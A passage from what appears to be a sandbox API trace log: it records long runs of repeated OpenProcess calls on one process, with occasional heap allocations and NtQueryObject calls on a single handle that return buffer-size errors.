(dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x360) returned 0x198 [0114.531] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x360) returned 0x198 [0114.531] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x360) returned 0x198 [0114.531] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x360) returned 0x198 [0114.531] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x360) returned 0x198 [0114.531] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x360) returned 0x198 [0114.531] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x360) returned 0x198 [0114.531] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x360) returned 0x198 [0114.531] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x360) returned 0x198 [0114.531] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x360) returned 0x198 [0114.531] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x360) returned 0x198 [0114.531] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x360) returned 0x198 [0114.532] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x360) returned 0x198 [0114.532] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x360) returned 0x198 [0114.532] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x360) returned 0x198 [0114.532] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x360) returned 0x198 [0114.532] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x360) returned 0x198 [0114.532] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x360) returned 0x198 [0114.532] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x360) returned 0x198 [0114.532] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x360) returned 0x198 [0114.532] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x360) returned 0x198 [0114.532] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x360) returned 0x198 [0114.532] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x360) returned 0x198 [0114.532] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x80) returned 0x32e40850 [0114.532] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x2, ObjectInformation=0x32e40850, ObjectInformationLength=0x76, ReturnLength=0xce88c | out: ObjectInformation=0x32e40850, ReturnLength=0xce88c) returned 0xc0000004 [0114.532] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x360) returned 0x198 [0114.532] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x360) returned 0x198 [0114.532] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x360) returned 0x198 [0114.532] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x360) returned 0x198 [0114.532] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x360) returned 0x198 [0114.532] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x360) returned 0x198 [0114.532] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x360) returned 0x198 [0114.532] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x360) returned 0x198 [0114.533] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x360) returned 0x198 [0114.533] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x360) returned 0x198 [0114.533] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x360) returned 0x198 [0114.533] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x80) returned 0x32e40850 [0114.533] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x2, ObjectInformation=0x32e40850, ObjectInformationLength=0x7e, ReturnLength=0xce88c | out: ObjectInformation=0x32e40850, ReturnLength=0xce88c) returned 0xc0000004 [0114.533] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x360) returned 0x198 [0114.533] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x360) returned 0x198 [0114.533] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x360) returned 0x198 [0114.533] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x80) returned 0x32e40850 [0114.533] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x2, ObjectInformation=0x32e40850, ObjectInformationLength=0x7e, ReturnLength=0xce88c | out: ObjectInformation=0x32e40850, ReturnLength=0xce88c) returned 0xc0000004 [0114.533] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x360) returned 0x198 [0114.533] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x80) returned 0x32e40850 [0114.533] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x2, ObjectInformation=0x32e40850, ObjectInformationLength=0x7e, ReturnLength=0xce88c | out: ObjectInformation=0x32e40850, ReturnLength=0xce88c) returned 0xc0000004 [0114.533] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x360) returned 0x198 [0114.533] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x80) returned 0x32e40850 [0114.533] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x2, ObjectInformation=0x32e40850, ObjectInformationLength=0x76, ReturnLength=0xce88c | out: ObjectInformation=0x32e40850, ReturnLength=0xce88c) returned 0xc0000004 [0114.533] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x360) returned 0x198 [0114.533] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x360) returned 0x198 [0114.533] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x360) returned 0x198 [0114.534] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x360) returned 0x198 [0114.534] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x360) returned 0x198 [0114.534] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x360) returned 0x198 [0114.534] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x360) returned 0x198 [0114.534] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x360) returned 0x198 [0114.534] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x360) returned 0x198 [0114.534] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x360) returned 0x198 [0114.534] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x360) returned 0x198 [0114.534] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x360) returned 0x198 [0114.534] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x360) returned 0x198 [0114.534] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x360) returned 0x198 [0114.534] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x360) returned 0x198 [0114.534] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x360) returned 0x198 [0114.534] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x360) returned 0x198 [0114.534] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x360) returned 0x198 [0114.534] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x360) returned 0x198 [0114.534] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x360) returned 0x198 [0114.534] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x360) returned 0x198 [0114.534] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x360) returned 0x198 [0114.534] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x360) returned 0x198 [0114.534] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x360) returned 0x198 [0114.534] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x360) returned 0x198 [0114.534] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x360) returned 0x198 [0114.534] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x360) returned 0x198 [0114.535] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x360) returned 0x198 [0114.535] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x360) returned 0x198 [0114.535] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x360) returned 0x198 [0114.535] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x360) returned 0x198 [0114.535] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x360) returned 0x198 [0114.535] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x360) returned 0x198 [0114.535] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x360) returned 0x198 [0114.535] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x360) returned 0x198 [0114.535] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x360) returned 0x198 [0114.535] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x360) returned 0x198 [0114.535] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x360) returned 0x198 [0114.535] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x360) returned 0x198 [0114.535] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x360) returned 0x198 [0114.535] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x360) returned 0x198 [0114.535] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x360) returned 0x198 [0114.535] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x360) returned 0x198 [0114.535] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x360) returned 0x198 [0114.535] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x360) returned 0x198 [0114.535] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x360) returned 0x198 [0114.535] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x360) returned 0x198 [0114.536] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x360) returned 0x198 [0114.536] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x360) returned 0x198 [0114.536] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x360) returned 0x198 [0114.536] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x360) returned 0x198 [0114.536] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x360) returned 0x198 [0114.536] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x360) returned 0x198 [0114.536] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x360) returned 0x198 [0114.536] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x360) returned 0x198 [0114.536] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x360) returned 0x198 [0114.536] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x360) returned 0x198 [0114.536] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x360) returned 0x198 [0114.536] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x360) returned 0x198 [0114.536] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x360) returned 0x198 [0114.536] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x360) returned 0x198 [0114.536] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x80) returned 0x32e40850 [0114.536] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x2, ObjectInformation=0x32e40850, ObjectInformationLength=0x7e, ReturnLength=0xce88c | out: ObjectInformation=0x32e40850, ReturnLength=0xce88c) returned 0xc0000004 [0114.536] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x360) returned 0x198 [0114.536] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x360) returned 0x198 [0114.536] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x360) returned 0x198 [0114.536] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x360) returned 0x198 [0114.536] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x360) returned 0x198 [0114.536] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x360) returned 0x198 [0114.536] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x360) returned 0x198 [0114.537] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x360) returned 0x198 [0114.537] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x360) returned 0x198 [0114.537] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x80) returned 0x32e40850 [0114.537] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x2, ObjectInformation=0x32e40850, ObjectInformationLength=0x76, ReturnLength=0xce88c | out: ObjectInformation=0x32e40850, ReturnLength=0xce88c) returned 0xc0000004 [0114.537] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x360) returned 0x198 [0114.537] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x360) returned 0x198 [0114.537] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x360) returned 0x198 [0114.537] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x360) returned 0x198 [0114.537] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x360) returned 0x198 [0114.537] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x80) returned 0x32e40850 [0114.537] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x2, ObjectInformation=0x32e40850, ObjectInformationLength=0x76, ReturnLength=0xce88c | out: ObjectInformation=0x32e40850, ReturnLength=0xce88c) returned 0xc0000004 [0114.537] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x360) returned 0x198 [0114.537] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x80) returned 0x32e40850 [0114.537] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x2, ObjectInformation=0x32e40850, ObjectInformationLength=0x76, ReturnLength=0xce88c | out: ObjectInformation=0x32e40850, ReturnLength=0xce88c) returned 0xc0000004 [0114.537] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x360) returned 0x198 [0114.537] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x360) returned 0x198 [0114.537] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x80) returned 0x32e40850 [0114.537] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x2, ObjectInformation=0x32e40850, ObjectInformationLength=0x76, ReturnLength=0xce88c | out: ObjectInformation=0x32e40850, ReturnLength=0xce88c) returned 0xc0000004 [0114.537] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x360) returned 0x198 [0114.537] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x360) returned 0x198 [0114.537] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x80) returned 0x32e40850 [0114.537] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x2, ObjectInformation=0x32e40850, ObjectInformationLength=0x76, ReturnLength=0xce88c | out: ObjectInformation=0x32e40850, ReturnLength=0xce88c) returned 0xc0000004 [0114.537] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x360) returned 0x198 [0114.538] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x360) returned 0x198 [0114.538] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x80) returned 0x32e40850 [0114.538] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x2, ObjectInformation=0x32e40850, ObjectInformationLength=0x76, ReturnLength=0xce88c | out: ObjectInformation=0x32e40850, ReturnLength=0xce88c) returned 0xc0000004 [0114.538] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x360) returned 0x198 [0114.538] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x360) returned 0x198 [0114.538] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x360) returned 0x198 [0114.538] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x360) returned 0x198 [0114.538] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x360) returned 0x198 [0114.538] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x360) returned 0x198 [0114.538] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x360) returned 0x198 [0114.538] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x360) returned 0x198 [0114.538] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x360) returned 0x198 [0114.538] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x360) returned 0x198 [0114.538] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x360) returned 0x198 [0114.538] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x360) returned 0x198 [0114.538] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x360) returned 0x198 [0114.538] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x360) returned 0x198 [0114.538] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x360) returned 0x198 [0114.538] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x360) returned 0x198 [0114.538] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x360) returned 0x198 [0114.538] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x360) returned 0x198 [0114.538] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x360) returned 0x198 [0114.538] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x360) returned 0x198 [0114.538] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x360) returned 0x198 [0114.539] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x360) returned 0x198 [0114.539] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x360) returned 0x198 [0114.539] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x360) returned 0x198 [0114.539] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x360) returned 0x198 [0114.539] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x360) returned 0x198 [0114.539] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x360) returned 0x198 [0114.539] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x360) returned 0x198 [0114.539] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x360) returned 0x198 [0114.539] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x360) returned 0x198 [0114.539] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x360) returned 0x198 [0114.539] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x360) returned 0x198 [0114.539] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x80) returned 0x32e40850 [0114.539] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x2, ObjectInformation=0x32e40850, ObjectInformationLength=0x76, ReturnLength=0xce88c | out: ObjectInformation=0x32e40850, ReturnLength=0xce88c) returned 0xc0000004 [0114.539] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x360) returned 0x198 [0114.539] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x80) returned 0x32e40850 [0114.539] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x2, ObjectInformation=0x32e40850, ObjectInformationLength=0x76, ReturnLength=0xce88c | out: ObjectInformation=0x32e40850, ReturnLength=0xce88c) returned 0xc0000004 [0114.539] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x360) returned 0x198 [0114.539] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x360) returned 0x198 [0114.539] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x360) returned 0x198 [0114.539] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x360) returned 0x198 [0114.539] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x360) returned 0x198 [0114.539] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x360) returned 0x198 [0114.539] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x360) returned 0x198 [0114.539] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x360) returned 0x198 [0114.540] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x360) returned 0x198 [0114.540] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x360) returned 0x198 [0114.540] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x360) returned 0x198 [0114.540] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x360) returned 0x198 [0114.540] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x360) returned 0x198 [0114.540] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x360) returned 0x198 [0114.540] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x80) returned 0x32e40850 [0114.540] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x2, ObjectInformation=0x32e40850, ObjectInformationLength=0x76, ReturnLength=0xce88c | out: ObjectInformation=0x32e40850, ReturnLength=0xce88c) returned 0xc0000004 [0114.540] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x360) returned 0x198 [0114.540] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x80) returned 0x32e40850 [0114.540] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x2, ObjectInformation=0x32e40850, ObjectInformationLength=0x76, ReturnLength=0xce88c | out: ObjectInformation=0x32e40850, ReturnLength=0xce88c) returned 0xc0000004 [0114.540] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x360) returned 0x198 [0114.540] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x360) returned 0x198 [0114.540] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x360) returned 0x198 [0114.540] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x360) returned 0x198 [0114.540] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x360) returned 0x198 [0114.540] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x360) returned 0x198 [0114.540] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x360) returned 0x198 [0114.540] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x360) returned 0x198 [0114.540] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x360) returned 0x198 [0114.540] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x360) returned 0x198 [0114.540] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x360) returned 0x198 [0114.540] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x360) returned 0x198 [0114.541] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x360) returned 0x198 [0114.541] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x360) returned 0x198 [0114.541] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x360) returned 0x198 [0114.541] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x360) returned 0x198 [0114.541] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x360) returned 0x198 [0114.541] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x360) returned 0x198 [0114.541] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x360) returned 0x198 [0114.541] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x360) returned 0x198 [0114.541] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x360) returned 0x198 [0114.541] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x360) returned 0x198 [0114.541] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x360) returned 0x198 [0114.541] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x360) returned 0x198 [0114.541] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x360) returned 0x198 [0114.541] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x360) returned 0x198 [0114.541] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x360) returned 0x198 [0114.541] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x360) returned 0x198 [0114.541] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x360) returned 0x198 [0114.541] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x360) returned 0x198 [0114.541] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x80) returned 0x32e40850 [0114.541] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x2, ObjectInformation=0x32e40850, ObjectInformationLength=0x7e, ReturnLength=0xce88c | out: ObjectInformation=0x32e40850, ReturnLength=0xce88c) returned 0xc0000004 [0114.541] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x360) returned 0x198 [0114.541] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x360) returned 0x198 [0114.541] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x360) returned 0x198 [0114.542] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x360) returned 0x198 [0114.542] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x360) returned 0x198 [0114.542] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x360) returned 0x198 [0114.542] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x360) returned 0x198 [0114.542] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x360) returned 0x198 [0114.542] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x360) returned 0x198 [0114.542] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x360) returned 0x198 [0114.542] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x360) returned 0x198 [0114.542] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x360) returned 0x198 [0114.542] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x360) returned 0x198 [0114.542] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x360) returned 0x198 [0114.542] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x360) returned 0x198 [0114.542] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x360) returned 0x198 [0114.542] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x360) returned 0x198 [0114.542] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x360) returned 0x198 [0114.542] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x360) returned 0x198 [0114.542] 